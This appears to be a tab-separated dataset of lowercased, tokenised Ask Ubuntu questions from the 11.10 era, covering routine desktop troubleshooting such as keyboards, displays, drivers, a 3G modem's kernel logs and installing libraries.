77164	make fn key from mac keyboard work on 11.10	i am using a mac keyboard slim aluminium with ubuntu 11.10 , the keyboard has f11 and f12 as controls for increasing and decreasing the volume . on boot the keys work as f keys but i would like them to behave as sound controls with the fn key . i followed the relevant guides from previous answers but nothing worked . i am running ubuntu 11.10 with gnome-shell .
77165	how to uninstall ubuntu from inside itself	i want to upgrade to 32-bit 11.10 but i ca n't seem to get rid of ubuntu 10.04 . i have windows 7 but no admin rights , so i ca n't remove it , and the admin wo n't do it because he does n't know what he 's doing .
77170	why does n't my laptop screen brightness go down when unplugged after 11.04 to 11.10 upgrade ?	as stated above , after the upgrade to 11.10 my laptop no longer dims the screen when i go on battery power . why ?
77173	hd 3000 graphics on ubuntu 11.10	i just installed 11.10 on a new gigabyte z68ap-d3-b3 , but in display settings i only had two resolution settings 800 x 600 and 1280 x 1024 ( i think ) . my monitor supports much more . from a good bit of research , this is still unclear . most forums say that the intel drivers are native on 11.10 . what can i do to increase my resolution and get the proper hardware to recognize ? thanks for any help . tim
77178	wrong keyboard layout when connecting with vnc	i connect to my ubuntu 11.10 machine from windows trought vnc ( ultravnc or tightvnc ) , and the keyboard layout is wrong . in both pc i use an spanish keyboard , and works ok , but when i 'm using ubuntu trought vnc , some keys are changed , ( i.e . - becomes / , etc ) . there 's a way to solve this ?
77182	focus gvim when opening a new file	i 'm trying to switch from a mac dev environment to a linux dev environment , but i 'm having a few problems . one of them is gvim . i would like to be able to double click a file in nautilus and then have gvim open it in a new tab . i already found how to open a file in a new tab here http : //stackoverflow.com/questions/1323790/have-nautilus-open-file-into-new-gvim-buffer but it does n't focus gvim yet . instead when i open a file unity 'wiggles ' the gvim icon and i still have to alt-tab to it manually . is there a way to open a file in a new gvim tab and focus gvim at the same time ? : ) edit : i forgot to add that i 'm using unity 2d on 11.10 .
77183	how t get pressure sensitivity work on a wacom bamboo pen ctl-460 ?	my tablet works fine except for the fact that i do n't have any pressure sensitivity . any idea on how to fix this ? edit : i have the same problem , but i can add that pressure sensitivity used to work under 11.04 .
77184	how to programatically remove empty new lines from a file ?	i need to remove empty new lines from text file in terminal . example file 123 123 123 123 123 123 i 've searched in google a bit but only solution found was sed '/^ $ /d ' myfile > tt and it does not help . i still got these empty new lines .
77188	compizconfig caused unity to change	after i installed compizconfig and just clicked on an option ( i do n't remember witch ) , the launcher bar disappeared completly and also the things in the upper-right corner are n't there anymore . i ca n't even usen alt+f2 . what should i do ? update : when i run unity in the terminal , the message `` unity-panel-service : no process found '' appears .
77191	how can i use lightdm for user-defined sessions ?	if i unterstand it correctly , lightdm has replaced gdm per default . i wonder if it 's possible to make it run the things i put in my .xinitrc file ... what i need is an option below `` unity '' and `` unity 2d '' which says `` run a user-defined session '' . is that possible ? should be the easiest thing , but i did not get a clue so far . i export and define and run a lot of things in this file , so it 's pretty important for me to have control over that . what i do not want is a custom session in /usr/some/where , i only want it to run the stuff from each user 's xinitrc ( or similar ) .
77195	why does the installer view my partitioned hard drive as one non-partitioned disk ?	i try to install 11.10 on my asus u30jc laptop . i have 3 partitions . 2 for windows and another ext3 partition for ubuntu . i try to install ubuntu with my usb flash memory . the problem is when you should select the installation partition , it just shows my hdd as a single 500 gigabyte unallocated partition . anyone has any idea what the problem may be ? /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 137129983 68461568 7 hpfs/ntfs/exfat /dev/sda3 137130901 210354175 36611637+ f w95 ext 'd ( lba ) /dev/sda5 210355173 976768064 383206446 7 hpfs/ntfs/exfat /dev/sda6 137134080 149716991 6291456 82 linux swap / solaris /dev/sda7 149719040 210354175 30317568 83 linux
77197	browser 's back button hidden by unity launcher	usually when i try to reach a back button on my browser , i end up with a launcher popping over it . so instead of simply pushing `` back '' button i have to deal with a launcher . i think this is unity 's launcher design problem . should i file a bug or what ?
77204	graphics card problem	i 'm having a ati radeon hd 4550 graphics card . the performance of my desktop is faster and smoother without install the driver for it . after installing the driver , the performance of my desktop is slower and less smooth . what should i do ? install the driver or not ?
77205	why is ubuntu default to allow everyone access to other users folders , admin or standard ?	why can other users see all my files by default , admin or standard users ? surely only the public folder should have a default share , with the option to share other folders with users and groups as the owner pleases ?
77208	is ubuntu visible on a windows network ?	in windows 7 , after configuring the network as `` home network '' , there is the option to create a 'home group ' where all the computers on that network are visible . can a windows machine see my ubuntu system is connected to that network ?
77210	how to change the default audio in wine to alsa only	i am trying to change the default audio sound system to alsa so it fixes some sound issues . how can this be done ? am using 1.3.x branch from ppa which is much better than the 1.1.x and 1.2.x in every way .
77211	upgrade to 11.10 - issue with quad monitors	i am having issues setting up my machine to use quad monitors . this was all working fine in 11.04 but since upgrading i have had no luck getting the configuration to work . if i use the same xorg.conf as i had working in 11.04 i get 4 clones of the same image on the monitors . not only this but if i click on an icon such as firefox in the launch bar , x restarts . getting two monitors working is simple and if i just remove the xorg.conf ubuntu is able to detect the two monitors and set them up correctly . i am not bothered about any fancy effects but it would be nice if i could get the system up and running with four monitors as i had before . i am not using the ati drivers , just the open source radeon driver as one of my cards is n't supported by the newer ati drivers . i am using two different ati cards on the system : 01:00.0 vga compatible controller : ati technologies inc rv516 [ radeon x1300/x1550 series ] 02:00.0 vga compatible controller : ati technologies inc mobility radeon hd 3600 series the xorg.conf is shown below : section `` monitor '' identifier `` monitor1 '' endsection section `` monitor '' identifier `` monitor2 '' endsection section `` monitor '' identifier `` monitor3 '' endsection section `` monitor '' identifier `` monitor4 '' endsection section `` device '' identifier `` card1 '' driver `` radeon '' busid `` pci:2:0:0 '' option `` dri '' `` off '' screen 0 endsection section `` device '' identifier `` card1_2 '' driver `` radeon '' busid `` pci:2:0:0 '' option `` dri '' `` off '' screen 1 endsection section `` device '' option `` zaphodheads '' `` dvi-0 '' identifier `` card2 '' driver `` radeon '' busid `` pci:1:0:0 '' option `` dri '' `` off '' screen 0 endsection section `` device '' option `` zaphodheads '' `` vga-0 '' identifier `` card2_2 '' driver `` radeon '' busid `` pci:1:0:0 '' option `` dri '' `` off '' screen 1 option `` rotate '' `` left '' endsection section `` screen '' identifier `` left '' device `` card1 '' monitor `` monitor1 '' endsection section `` screen '' identifier `` middle '' device `` card1_2 '' monitor `` monitor2 '' endsection section `` screen '' identifier `` right '' device `` card2 '' monitor `` monitor3 '' endsection section `` screen '' identifier `` farright '' device `` card2_2 '' monitor `` monitor4 '' endsection section `` serverflags '' option `` xinerama '' `` true '' option `` aiglx '' `` false '' endsection section `` serverlayout '' identifier `` layout1 '' screen 0 `` left '' 0 0 screen `` middle '' rightof `` left '' screen `` right '' rightof `` middle '' screen `` farright '' rightof `` right '' option `` xinerama '' `` on '' endsection anyone have any suggestions ?
77215	no color in xubuntu wallpaper	for some reason , my ubuntu wallpaper suddenly turned black and white . if i try to change the desktop wallpaper image it always shows in black and white only ( i.e . no color ) . where the heck can i change this strange behavior ? i 'm running the xubuntu desktop ( i.e . xfce ) on an ubuntu 11.10 installation ( switched to the xubuntu desktop after giving up on unity ) .
77216	how to have the taskbar with unity at the same time ?	my question is simple . how can i have the classic taskbar with unity at the same time in ubuntu 11.10 ? somehow in the previous version i managed to achieve that , but now i can not remember how did i do that !
77218	does calibre support full text indexing / search ?	calibre has tons of plugins , but what i really miss is full text search for all my books ( mainly pdf and djvu ) . is this implemented , is there a plugin available ? i can only find feature requests that are years old and unfixed launchpad bugs . if full text search is not available , are there any alternatives that do provide this ? thank you for your help , reset
77219	lid closed power option does n't work anymore	after upgrade to 11.10 the lid close option in the power settings doesnt seem to work anymore . only options now are hibernate or suspend , but both do n't seem to work . i now have to shut down manualy . any ideas ?
77220	where is ubuntu installed when i create a dual-boot setup ?	i am an ubuntu newbie . i have just installed ubuntu alongside windows 7 . i am dual-booting . but what i wonder is where did ubuntu get installed to , and how much partition space is ubuntu using right now ? for example , i did n't setup partitions for / , /home , etc . setup completed the installation without notifying me anything .
77222	ubuntu 11.10 software center ( proxy ? )	i am unable to install software using the software center at work . a nearly identical install of 11.10 at home works fine . i suspect the proxy settings are the problem , as they are used at work , but not at home . the system at work does browse the web and respond appropriately to nslookup 's .
77228	running three screens ( laptop and 2 external monitors )	kind of an ubuntu noob here . i 'm trying to run 2 external monitors along with my laptop monitor on ubuntu 11.04 . i have a lenovo t520 with the following graphics : vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) i have turned on all three displays under `` monitors '' , but only the two external screens are displaying anything . the laptop screen will not display . running xrandr gives the following ( when both externals are hooked up ) : screen 0 : minimum 320 x 200 , current 3600 x 1080 , maximum 8192 x 8192 lvds1 connected ( normal left inverted right x axis y axis ) 1600x900 60.0 + 50.0 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1680x1050+1920+0 ( normal left inverted right x axis y axis ) 473mm x 296mm 1680x1050 60.0*+ 1600x1200 60.0 1280x1024 75.0 60.0 1440x900 75.0 59.9 1280x960 60.0 1152x864 75.0 1280x720 60.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 hdmi1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 531mm x 298mm 1920x1080 60.0*+ 1600x1200 60.0 1680x1050 60.0 1280x1024 75.0 60.0 1440x900 75.0 59.9 1152x864 75.0 1280x720 60.0 1024x768 75.1 70.1 60.0 800x600 72.2 75.0 60.3 56.2 720x480 59.9 640x480 72.8 75.0 60.0 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) hdmi3 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis ) as you can see , the lvds1 display is `` connected '' but no resolution is selected , even though a resolution is selected under the `` monitors '' window . am i doing something wrong ? or is this even possible ? sorry if this is a stupid question .
77229	how do i enable the built-in wireless on my hp mini 110-3710 ?	how do i enable the built-in wireless on my hp mini 110-3710 ? there is no check mark next to enable wireless . it disable wireless when you try it . my wirelss card is greyed out ( rtl8188ce ) and says wireless is disabled under it . if i plug in a usb wifi adapter it works without a problem . definitly an issue with internal wifi card . the wifi button on the keyboard will disable all wireless if i press it . it will grey out the enable wireless on the network manager if pressed , and will ungrey it when pressed again . so it seems to have no effect on the actual hardware . just on the wireless networking service . *-network disabled description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 01 serial : d0 : df:9a:93:82 : be width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.0.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 ioport:3000 ( size=256 ) memory:55000000-55003fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : 44:1e : a1 : cd : cc : d3 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:1000 ( size=256 ) memory:52004000-52004fff memory:52000000-52003fff 0 : hp-wifi : wireless lan soft blocked : yes hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : yes
77230	how to use huawei k3765 under ubuntu ?	before and after plugging in the 3g modem : root @ machine : ~ # ls /dev/ttyusb* ls : can not access /dev/ttyusb* : no such file or directory root @ machine : ~ # logs : root @ machine : ~ # tail -f /var/log/messages nov 9 11:43:37 localhost kernel : [ 423418.057015 ] usb 1-2 : new high speed usb device using ehci_hcd and address 99 nov 9 11:43:38 localhost kernel : [ 423418.191322 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:43:38 localhost kernel : [ 423418.196033 ] scsi121 : scsi emulation for usb mass storage devices nov 9 11:43:38 localhost usb-modeswitch : switching 12d1:1520 ( huawei technology : huawei mobile ) nov 9 11:43:38 localhost kernel : [ 423418.706980 ] usb 1-2 : usb disconnect , address 99 nov 9 11:43:42 localhost kernel : [ 423422.941015 ] usb 1-2 : new high speed usb device using ehci_hcd and address 100 nov 9 11:43:42 localhost kernel : [ 423423.074346 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:43:42 localhost kernel : [ 423423.076801 ] option 1-2:1.0 : gsm modem ( 1-port ) converter detected nov 9 11:43:42 localhost kernel : [ 423423.076889 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb0 nov 9 11:43:42 localhost kernel : [ 423423.077042 ] option 1-2:1.2 : gsm modem ( 1-port ) converter detected nov 9 11:43:42 localhost kernel : [ 423423.077095 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb1 nov 9 11:43:42 localhost kernel : [ 423423.077157 ] option 1-2:1.3 : gsm modem ( 1-port ) converter detected nov 9 11:43:42 localhost kernel : [ 423423.077209 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb2 nov 9 11:43:42 localhost kernel : [ 423423.085767 ] scsi122 : scsi emulation for usb mass storage devices nov 9 11:43:42 localhost kernel : [ 423423.088685 ] scsi123 : scsi emulation for usb mass storage devices nov 9 11:43:43 localhost usb-modeswitch : switched to 12d1:1465 ( huawei technology : huawei mobile ) nov 9 11:43:48 localhost kernel : [ 423429.122630 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 nov 9 11:43:48 localhost kernel : [ 423429.122651 ] option 1-2:1.0 : device disconnected nov 9 11:43:48 localhost kernel : [ 423429.122720 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 nov 9 11:43:48 localhost kernel : [ 423429.122743 ] option 1-2:1.2 : device disconnected nov 9 11:43:48 localhost kernel : [ 423429.122812 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 nov 9 11:43:48 localhost kernel : [ 423429.122829 ] option 1-2:1.3 : device disconnected nov 9 11:43:49 localhost kernel : [ 423429.236063 ] usb 1-2 : usb disconnect , address 100 nov 9 11:43:52 localhost kernel : [ 423432.976035 ] usb 1-2 : new high speed usb device using ehci_hcd and address 101 nov 9 11:43:52 localhost kernel : [ 423433.111196 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:43:52 localhost kernel : [ 423433.112234 ] scsi124 : scsi emulation for usb mass storage devices nov 9 11:43:53 localhost usb-modeswitch : switching 12d1:1520 ( huawei technology : huawei mobile ) nov 9 11:43:53 localhost kernel : [ 423433.626977 ] usb 1-2 : usb disconnect , address 101 nov 9 11:43:57 localhost kernel : [ 423437.977017 ] usb 1-2 : new high speed usb device using ehci_hcd and address 102 nov 9 11:43:57 localhost kernel : [ 423438.111340 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:43:57 localhost kernel : [ 423438.113796 ] option 1-2:1.0 : gsm modem ( 1-port ) converter detected nov 9 11:43:57 localhost kernel : [ 423438.113885 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb0 nov 9 11:43:57 localhost kernel : [ 423438.114029 ] option 1-2:1.2 : gsm modem ( 1-port ) converter detected nov 9 11:43:57 localhost kernel : [ 423438.114084 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb1 nov 9 11:43:57 localhost kernel : [ 423438.114148 ] option 1-2:1.3 : gsm modem ( 1-port ) converter detected nov 9 11:43:57 localhost kernel : [ 423438.114200 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb2 nov 9 11:43:57 localhost kernel : [ 423438.114528 ] scsi125 : scsi emulation for usb mass storage devices nov 9 11:43:57 localhost kernel : [ 423438.114763 ] scsi126 : scsi emulation for usb mass storage devices nov 9 11:43:58 localhost usb-modeswitch : switched to 12d1:1465 ( huawei technology : huawei mobile ) nov 9 11:44:03 localhost kernel : [ 423444.116264 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 nov 9 11:44:03 localhost kernel : [ 423444.116287 ] option 1-2:1.0 : device disconnected nov 9 11:44:03 localhost kernel : [ 423444.116373 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 nov 9 11:44:03 localhost kernel : [ 423444.116393 ] option 1-2:1.2 : device disconnected nov 9 11:44:03 localhost kernel : [ 423444.116466 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 nov 9 11:44:03 localhost kernel : [ 423444.116490 ] option 1-2:1.3 : device disconnected nov 9 11:44:04 localhost kernel : [ 423444.229033 ] usb 1-2 : usb disconnect , address 102 nov 9 11:44:07 localhost kernel : [ 423447.940014 ] usb 1-2 : new high speed usb device using ehci_hcd and address 103 nov 9 11:44:07 localhost kernel : [ 423448.076410 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:44:07 localhost kernel : [ 423448.077432 ] scsi127 : scsi emulation for usb mass storage devices nov 9 11:44:08 localhost usb-modeswitch : switching 12d1:1520 ( huawei technology : huawei mobile ) nov 9 11:44:08 localhost kernel : [ 423448.592693 ] usb 1-2 : usb disconnect , address 103 nov 9 11:44:12 localhost kernel : [ 423452.932013 ] usb 1-2 : new high speed usb device using ehci_hcd and address 104 nov 9 11:44:12 localhost kernel : [ 423453.066182 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:44:12 localhost kernel : [ 423453.068633 ] option 1-2:1.0 : gsm modem ( 1-port ) converter detected nov 9 11:44:12 localhost kernel : [ 423453.068723 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb0 nov 9 11:44:12 localhost kernel : [ 423453.068866 ] option 1-2:1.2 : gsm modem ( 1-port ) converter detected nov 9 11:44:12 localhost kernel : [ 423453.068920 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb1 nov 9 11:44:12 localhost kernel : [ 423453.068982 ] option 1-2:1.3 : gsm modem ( 1-port ) converter detected nov 9 11:44:12 localhost kernel : [ 423453.069046 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb2 nov 9 11:44:12 localhost kernel : [ 423453.086987 ] scsi128 : scsi emulation for usb mass storage devices nov 9 11:44:12 localhost kernel : [ 423453.097383 ] scsi129 : scsi emulation for usb mass storage devices nov 9 11:44:13 localhost usb-modeswitch : switched to 12d1:1465 ( huawei technology : huawei mobile ) nov 9 11:44:19 localhost kernel : [ 423459.520090 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 nov 9 11:44:19 localhost kernel : [ 423459.520112 ] option 1-2:1.0 : device disconnected nov 9 11:44:19 localhost kernel : [ 423459.520184 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 nov 9 11:44:19 localhost kernel : [ 423459.520210 ] option 1-2:1.2 : device disconnected nov 9 11:44:19 localhost kernel : [ 423459.520278 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 nov 9 11:44:19 localhost kernel : [ 423459.520295 ] option 1-2:1.3 : device disconnected nov 9 11:44:19 localhost kernel : [ 423459.633030 ] usb 1-2 : usb disconnect , address 104 nov 9 11:44:23 localhost kernel : [ 423463.978147 ] usb 1-2 : new high speed usb device using ehci_hcd and address 105 nov 9 11:44:23 localhost kernel : [ 423464.111465 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:44:23 localhost kernel : [ 423464.114922 ] scsi130 : scsi emulation for usb mass storage devices nov 9 11:44:24 localhost usb-modeswitch : switching 12d1:1520 ( huawei technology : huawei mobile ) nov 9 11:44:24 localhost kernel : [ 423464.629736 ] usb 1-2 : usb disconnect , address 105 nov 9 11:44:28 localhost kernel : [ 423468.969014 ] usb 1-2 : new high speed usb device using ehci_hcd and address 106 nov 9 11:44:28 localhost kernel : [ 423469.103236 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:44:28 localhost kernel : [ 423469.105684 ] option 1-2:1.0 : gsm modem ( 1-port ) converter detected nov 9 11:44:28 localhost kernel : [ 423469.105769 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb0 nov 9 11:44:28 localhost kernel : [ 423469.105913 ] option 1-2:1.2 : gsm modem ( 1-port ) converter detected nov 9 11:44:28 localhost kernel : [ 423469.105970 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb1 nov 9 11:44:28 localhost kernel : [ 423469.106231 ] option 1-2:1.3 : gsm modem ( 1-port ) converter detected nov 9 11:44:28 localhost kernel : [ 423469.106288 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb2 nov 9 11:44:28 localhost kernel : [ 423469.106462 ] scsi131 : scsi emulation for usb mass storage devices nov 9 11:44:28 localhost kernel : [ 423469.106706 ] scsi132 : scsi emulation for usb mass storage devices nov 9 11:44:29 localhost usb-modeswitch : switched to 12d1:1465 ( huawei technology : huawei mobile ) nov 9 11:44:35 localhost kernel : [ 423475.735012 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 nov 9 11:44:35 localhost kernel : [ 423475.735033 ] option 1-2:1.0 : device disconnected nov 9 11:44:35 localhost kernel : [ 423475.735105 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 nov 9 11:44:35 localhost kernel : [ 423475.735133 ] option 1-2:1.2 : device disconnected nov 9 11:44:35 localhost kernel : [ 423475.735201 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 nov 9 11:44:35 localhost kernel : [ 423475.735219 ] option 1-2:1.3 : device disconnected nov 9 11:44:35 localhost kernel : [ 423475.848029 ] usb 1-2 : usb disconnect , address 106 nov 9 11:44:39 localhost kernel : [ 423479.932153 ] usb 1-2 : new high speed usb device using ehci_hcd and address 107 nov 9 11:44:39 localhost kernel : [ 423480.066396 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:44:39 localhost kernel : [ 423480.067423 ] scsi133 : scsi emulation for usb mass storage devices nov 9 11:44:40 localhost usb-modeswitch : switching 12d1:1520 ( huawei technology : huawei mobile ) nov 9 11:44:40 localhost kernel : [ 423480.583557 ] usb 1-2 : usb disconnect , address 107 nov 9 11:44:44 localhost kernel : [ 423484.924147 ] usb 1-2 : new high speed usb device using ehci_hcd and address 108 nov 9 11:44:44 localhost kernel : [ 423485.059297 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:44:44 localhost kernel : [ 423485.061750 ] option 1-2:1.0 : gsm modem ( 1-port ) converter detected nov 9 11:44:44 localhost kernel : [ 423485.061838 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb0 nov 9 11:44:44 localhost kernel : [ 423485.061980 ] option 1-2:1.2 : gsm modem ( 1-port ) converter detected nov 9 11:44:44 localhost kernel : [ 423485.062035 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb1 nov 9 11:44:44 localhost kernel : [ 423485.062100 ] option 1-2:1.3 : gsm modem ( 1-port ) converter detected nov 9 11:44:44 localhost kernel : [ 423485.062160 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb2 nov 9 11:44:44 localhost kernel : [ 423485.067591 ] scsi134 : scsi emulation for usb mass storage devices nov 9 11:44:44 localhost kernel : [ 423485.081538 ] scsi135 : scsi emulation for usb mass storage devices nov 9 11:44:45 localhost usb-modeswitch : switched to 12d1:1465 ( huawei technology : huawei mobile ) nov 9 11:44:50 localhost kernel : [ 423490.814586 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 nov 9 11:44:50 localhost kernel : [ 423490.814602 ] option 1-2:1.0 : device disconnected nov 9 11:44:50 localhost kernel : [ 423490.814680 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 nov 9 11:44:50 localhost kernel : [ 423490.814708 ] option 1-2:1.2 : device disconnected nov 9 11:44:50 localhost kernel : [ 423490.814778 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 nov 9 11:44:50 localhost kernel : [ 423490.814797 ] option 1-2:1.3 : device disconnected nov 9 11:44:50 localhost kernel : [ 423490.929038 ] usb 1-2 : usb disconnect , address 108 nov 9 11:44:54 localhost kernel : [ 423494.964149 ] usb 1-2 : new high speed usb device using ehci_hcd and address 109 nov 9 11:44:54 localhost kernel : [ 423495.098227 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:44:54 localhost kernel : [ 423495.099271 ] scsi136 : scsi emulation for usb mass storage devices nov 9 11:44:55 localhost usb-modeswitch : switching 12d1:1520 ( huawei technology : huawei mobile ) nov 9 11:44:55 localhost kernel : [ 423495.614634 ] usb 1-2 : usb disconnect , address 109 nov 9 11:44:59 localhost kernel : [ 423499.956044 ] usb 1-2 : new high speed usb device using ehci_hcd and address 110 nov 9 11:44:59 localhost kernel : [ 423500.090998 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:44:59 localhost kernel : [ 423500.093453 ] option 1-2:1.0 : gsm modem ( 1-port ) converter detected nov 9 11:44:59 localhost kernel : [ 423500.093543 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb0 nov 9 11:44:59 localhost kernel : [ 423500.093690 ] option 1-2:1.2 : gsm modem ( 1-port ) converter detected nov 9 11:44:59 localhost kernel : [ 423500.093746 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb1 nov 9 11:44:59 localhost kernel : [ 423500.093809 ] option 1-2:1.3 : gsm modem ( 1-port ) converter detected nov 9 11:44:59 localhost kernel : [ 423500.093862 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb2 nov 9 11:44:59 localhost kernel : [ 423500.095971 ] scsi137 : scsi emulation for usb mass storage devices nov 9 11:44:59 localhost kernel : [ 423500.110667 ] scsi138 : scsi emulation for usb mass storage devices nov 9 11:45:00 localhost usb-modeswitch : switched to 12d1:1465 ( huawei technology : huawei mobile ) nov 9 11:45:06 localhost kernel : [ 423506.193916 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 nov 9 11:45:06 localhost kernel : [ 423506.193938 ] option 1-2:1.0 : device disconnected nov 9 11:45:06 localhost kernel : [ 423506.194010 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 nov 9 11:45:06 localhost kernel : [ 423506.194038 ] option 1-2:1.2 : device disconnected nov 9 11:45:06 localhost kernel : [ 423506.194109 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 nov 9 11:45:06 localhost kernel : [ 423506.194126 ] option 1-2:1.3 : device disconnected nov 9 11:45:06 localhost kernel : [ 423506.309029 ] usb 1-2 : usb disconnect , address 110 nov 9 11:45:09 localhost kernel : [ 423509.933015 ] usb 1-2 : new high speed usb device using ehci_hcd and address 111 nov 9 11:45:09 localhost kernel : [ 423510.067119 ] usb 1-2 : configuration # 1 chosen from 1 choice nov 9 11:45:09 localhost kernel : [ 423510.068160 ] scsi139 : scsi emulation for usb mass storage devices nov 9 11:45:10 localhost usb-modeswitch : switching 12d1:1520 ( huawei technology : huawei mobile ) nov 9 11:45:10 localhost kernel : [ 423510.583529 ] usb 1-2 : usb disconnect , address 111 ^c root @ machine : ~ # the problematic 3g modem is a k3765 . how to bring it to life ? lsusb : bus 002 device 012 : id 12d1:1465 huawei technologies co. , ltd. ubuntu 10.04
77232	use totem 's decoder to re-encode video ?	i recorded an ogv screencast in gtk-recordmydesktop that seems to play back differently in different players ( and youtube does n't seem to understand the video stream at all -- it just displays a green blob ) . when i try to use ffmpeg to transcode the ogv to ogv the video races to the last frame in the first few milliseconds . however , totem plays the video back fine . so , my question is : is there a way to use the totem decoder ( which i know understands the ogv file properly ) to transcode the video through ffmpeg ? that would presumably repair it . thanks !
77233	is there a desktop application for launchpad.net ?	i was looking at the launchpad.net and came to this page ( see the screenshot below ) . i started wondering if there are any desktop applications for using launchpad.net without the necessity of a web browser . are there any ?
77237	install intel hd graphics	i have just installed ubuntu 11.10 on my pb easynote tk i3 . i now want to install driver for the intel hd graphics to have a better resolution but i do n't know how to do that . thanks
77247	i 've downloaded a .sh file - how do i install this ?	i 'm new to ubuntu and know installing programs only from window . it is very easy there : just double-click the setup.exe and the things start . but how do i install a program on ubuntu ? i want to install something which i could n't find in the ubuntu software center . i downloaded a .sh file and now i do n't know what to do with it .
77249	where is showdesktop button on 11.10 ?	i understand that alt-ctrl-d will show the desktop in unity 2d , but is there a button that will do the same thing for when my hands are n't on the keyboard ? i saw unity 3d had it as a choice in the app switcher , but unity 2d does not .
77255	restore ubuntu after power outage	the problem is after short power outage i 'm getting message like `` gave up waiting for root device . alert ! /dev/disk/by-uuid/ { long_guid_ } does not exists . dropping to a shell '' . how do i fix it ? ubuntu was installed on raid-5 , if that makes any sense
77256	i want to install libssl.0.9.8	i 'm trying to install utorrent program , and when i execute the program i get ./utserver : error while loading shared libraries : libssl.so.0.9.8 : can not open shared object file : no such file or directory i 'm navigating the different forums since yesterday and i did n't find anything helpful till now , so please tell me what 's the problem ? ?
77260	how to remove a launcher from a gnome panel ?	my kids put some bogus launcher on top bar ( i have no idea how ) : how can i remove it ? i get only next options : properties and launch .
